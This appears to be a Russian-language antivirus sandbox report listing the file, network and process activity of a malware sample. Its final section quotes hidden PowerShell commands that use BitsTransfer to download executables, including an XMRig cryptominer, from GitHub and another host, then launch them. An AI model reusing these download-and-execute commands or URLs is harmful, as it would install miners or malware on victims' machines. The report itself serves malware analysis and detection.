Техническая информация
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\ixp000.tmp\pkbseb.dat
- %TEMP%\ixp000.tmp\fyirh
Удаляет следующие файлы
- %TEMP%\ixp000.tmp\fyirh
- %TEMP%\ixp000.tmp\pkbseb.dat
Сетевая активность
Подключается к
- 'microsoft.com':80
- 'gi##ub.com':443
TCP
Запросы HTTP GET
- http://www.microsoft.com/pki/certs/MicRooCerAut_2010-06-23.crt
Другие
- 'gi##ub.com':443
UDP
- DNS ASK microsoft.com
- DNS ASK gi##ub.com
Другое
Создает и запускает на исполнение
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -command Import-Module BitsTransfer; Start-BitsTransfer -Source https://github.com/rasya11rasya/rasya11rasyaaa/raw/main/gizega.exe,https://oldfloppy.mn/derises/xmrig_6.18.0.exe -Destination Hj....' (со скрытым окном)
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -command Start-Process Hj.exe; Start-Process Wh.exe;' (со скрытым окном)
Запускает на исполнение
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -command Start-Process Hj.exe; Start-Process Wh.exe;
